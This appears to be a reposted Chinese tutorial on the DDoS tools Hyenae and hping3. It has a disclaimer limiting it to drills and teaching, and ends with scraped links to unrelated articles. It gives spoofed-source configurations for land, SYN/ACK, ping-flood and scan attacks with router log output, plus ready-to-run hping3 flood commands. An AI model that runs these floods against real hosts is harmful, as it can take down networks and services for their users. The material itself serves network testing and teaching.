来源: http://www.safecdn.cn/linux/2018/12/ddos/95.html ‎

特别提示:仅用于攻防演练及教学测试用途,禁止非法使用

Hyenae

是在windows平台上非常好用的一款ddos攻击工具,可以完成绝大多数的攻击操作。

download

Features

  • ARP-Request flooding
  • ARP-Cache poisoning
  • PPPoE session initiation flooding
  • Blind PPPoE session termination
  • ICMP-Echo flooding
  • ICMP-Smurf attack
  • ICMP based TCP-Connection reset
  • TCP-SYN flooding
  • TCP-Land attack
  • Blind TCP-Connection reset
  • UDP flooding
  • DNS-Query flooding
  • DHCP-Discover flooding
  • DHCP starvation attack
  • DHCP-Release forcing
  • Cisco HSRP active router hijacking
  • Pattern based packet address configuration
  • Intelligent address and address protocol detection
  • Smart wildcard-based randomization
  • Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

鬣狗界面

hyenae的界面比较简单,图中展示的是SYN/ACK洪泛攻击的配置选项。

  • operation mode中可以选择网卡
  • Network Protocol中可以选择攻击方式对应的网络协议,如SYN洪泛攻击对应传输层的TCP,IP协议可选IPv4, IPv6
  • 攻击源的IP,MAC地址以及端口号可以非常灵活的设置,按MAC-IP@port的格式书写,如图中的攻击源匹配模式%-172.17.14.158@80

    • % 代表任意,在此处代表任意的MAC地址
    • 172.17.14.158为伪造的攻击源IP,可以修改为任意的合法IP
    • 80为端口号,80同时也是网络服务器的默认端口
  • 攻击目标的设置方式与攻击源一致,图中的%-172.17.14.10@80

    • % 随机生成MAC地址
    • 172.17.14.10代表被攻击的IP
    • 80为攻击目标的被攻击端口号
  • 针对TCP协议,右侧给出其对应的5个常见flags: FIN, SYN, RST, PSH, ACK

    • 可以随意进行单选或多选,以实现不同的攻击方式
    • 随意的组合可以产生正常通信过程中无法出现的数据包
  • 软件下方可以设置数据包的发送速率,默认为无限速发送,这会暂用大量带宽,导致网络拥塞;当然啦,这个软件本就是为了攻击网络,导致网络瘫痪正是其目的所在
  • 选择不同的攻击方式,会显示相应不同的配置选项

简单说,这幅图的作用是产生MAC地址随机,IP为172.17.14.158,端口为80的伪造源,去攻击目的MAC随机,IP为172.17.14.10的web server。

由于目的MAC随机,当MAC地址首字节为奇数时,生成的数据包为广播包,此时将产生广播风暴,局域网内的所有设备都将收到大量的广播包,当速率很高时,很容易导致局域网瘫痪,这是需要注意的。本人当时年少轻狂,有次测试,使用全速率的广播式SYN/ACK攻击,直接导致部门的局域网瘫痪断网,幸好是晚上,后来找人重置了部门内的网络设备才恢复,想想真是罪过啊。

Use cases

  • Land Attack

    • src: %-172.17.14.94@53
    • des: %-172.17.14.94@80
1
2
3
4
DoS *** 3118 *** {Land Attack} are suppressed!
[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  • SYN/ACK scan (TCP SYN ACK)

    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1
2
3
4
DoS *** 3896 *** {SYN/ACK Scan} are suppressed!
[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  • ping flood (icmp echo)

    • src: %-172.17.14.8
    • des: %-172.17.14.94
1
2
3
4
DoS *** 1881 *** {Ping Flood} are suppressed!
[DoS Attack: Ping Flood] from source: 172.17.14.8,
[DoS Attack: Ping Flood] from source: 172.17.14.8,
[DoS Attack: Ping Flood] from source: 172.17.14.8,
  • ping sweep (icmp echo)

    • src: %-%
    • des: %-%
1
2
3
4
DoS *** 1719 *** {Ping Sweep} are suppressed!
[DoS Attack: Ping Sweep] from source: 188.167.1.1,
[DoS Attack: Ping Sweep] from source: 113.172.1.5,
[DoS Attack: Ping Sweep] from source: 175.181.2.6,
  • RST Scan(TCP RST)

    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1
2
3
4
DoS *** 4023 *** {RST Scan} are suppressed!
[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  • ACK scan (TCP ACK)

    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1
2
3
4
DoS *** 3989 *** {ACK Scan} are suppressed!
[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80
  • FIN scan(TCP FIN)

    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1
2
3
4
DoS *** 3009 *** {FIN Scan} are suppressed!
[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

hping3

用于生成和解析TCPIP协议数据包的开源工具

hping3同样可用于产生ddos攻击包,但与hyenae不同的是,hping3无法手动设置MAC地址,而是根据IP地址自动获取

需要注意的是,如果使用搬瓦工购买的vps向公网IP执行hping3攻击的话,最好不要尝试,如果要用也一定记得限速,否则就会被警告并关停,当然你有3次机会重置

vps警告

examples

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# land attack
$ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52
# syn/ack attack
$ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52 # -V verbose
# -c packet count
# -d data size
# -p destPort
# -s srcPort
# -a srcIP
# -S SYN tag
# -A ACK tag
# -w winsize
# -I interface

reference

实用的DDos攻击工具的更多相关文章

  1. DDOS 攻击工具

    DDOS  攻击工具 使用github上的DDOS攻击工具 https://github.com/Ha3MrX/DDos-Attack 将python脚本拷贝到主机,使用 chmod +x ddos- ...

  2. DDoS攻击工具

    DDoS攻击工具 综合性工具 综合性工具除了可以进行DDoS攻击外,还可用于其他的用途,例如:端口扫描.安全审计.防火墙等.实际上,大部分综合性工具开发的原始目的并不是用于DDoS,而是"网 ...

  3. 免费DDOS攻击测试工具大合集

    FreeBuf微科普: DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访 ...

  4. DDOS攻击方式总结以及免费DDOS攻击测试工具大合集

    若有雷同或者不足之处,欢迎指正交流,谢谢! DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提 ...

  5. 漫画告诉你什么是DDoS攻击?

    本文作者:魏杰 文章转载自:绿盟科技博客,原文标题:看ADS如何治愈DDoS伤痛 根据<2015 H1绿盟科技DDoS威胁报告>指出,如今大流量网络攻击正逐渐呈现增长趋势,前不久锤子科技的 ...

  6. 程序员快递请查收,来自Python黑客大佬的一份DDOS攻击说明书!

    DDoS攻击没有我们想象中的那么简单,并不是什么Python程序员都能够做到的. 若要知晓黑客利用DDOS攻击原理那么我们必须要知道是实行DDoS攻击比较难的原因是什么? 很简单的一句话概括:&quo ...

  7. 免费的DDos网络测试工具集合

    今天晚上看YT上的hulk VS monster Dogs 然后想看电影资源,给我推送了hulk这款工具了解下,发现了一些东西,收藏下 1.卢瓦(LOIC) (Low Orbit Ion Canon) ...

  8. cc攻击和ddos攻击

    DoS攻击.CC攻击的攻击方式和防御方法 DDoS介绍 DDoS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of ...

  9. CC攻击工具list

    从论文里抠出来的工具列表如下,后面有黑产的工具以及网络上摘录的工具: 分类:(1)有僵尸网络(是否代理服务器)&没有的==>(2)单一url&混合url(多线程,压测为主,dem ...

随机推荐

  1. 局域网内远程连接OPC配置方法详解

    局域网内远程连接OPC配置方法详解 https://wenku.baidu.com/view/20fb8ea6d1d233d4b14e852458fb770bf78a3bcc.html   OPC服务 ...

  2. Redis集群事物提交异常Multi-key operations must involve a single slot

    redis做完集群后不同键在同一事物中提交,因为key的hash计算结果不同不能分配到同一个分片上,因此出现此异常. 解决方案:在本次事物的key内添加"{tag}",这时redi ...

  3. java浅析final关键字

    谈到final关键字,想必很多人都不陌生,在使用匿名内部类的时候可能会经常用到final关键字.另外,Java中的String类就是一个final类,那么今天我们就来了解final这个关键字的用法. ...

  4. P1706 全排列问题

    题解:(其实我认为它就是个循环) #include<iostream> #include<cstdio> #include<iomanip> using names ...

  5. [转载]领域驱动设计(Domain Driven Design)参考架构详解

    摘要 本文将介绍领域驱动设计(Domain Driven Design)的官方参考架构,该架构分成了Interfaces.Applications和Domain三层以及包含各类基础设施的Infrast ...

  6. python 数组 变成 字典的方法

    1.现在有两个列表,list1 = ['key1','key2','key3']和list2 = ['1','2','3'],把他们转为这样的字典:{'key1':'1','key2':'2','ke ...

  7. 云中树莓派(5):利用 AWS IoT Greengrass 进行 IoT 边缘计算

    云中树莓派(1):环境准备 云中树莓派(2):将传感器数据上传到AWS IoT 并利用Kibana进行展示 云中树莓派(3):通过 AWS IoT 控制树莓派上的Led 云中树莓派(4):利用声音传感 ...

  8. go中的make和new的区别

    适用范围:make 只能创建内建类型(slice map channel), new 则是可以对所有类型进行内存分配 返回值: new 返回指针, make 返回引用 填充值: new 填充零值, m ...

  9. F5负载均衡原理(转载)

    https://blog.csdn.net/panxueji/article/details/42647193 一. 负载均衡技术 负载均衡技术在现有网络结构之上提供了一种廉价.有效.透明的方法,来扩 ...

  10. android判断adb调试是否打开及代码跳转到开发者选项界面

    boolean enableAdb = (Settings.Secure.getInt(getContentResolver(), Settings.Secure.ADB_ENABLED, 0) &g ...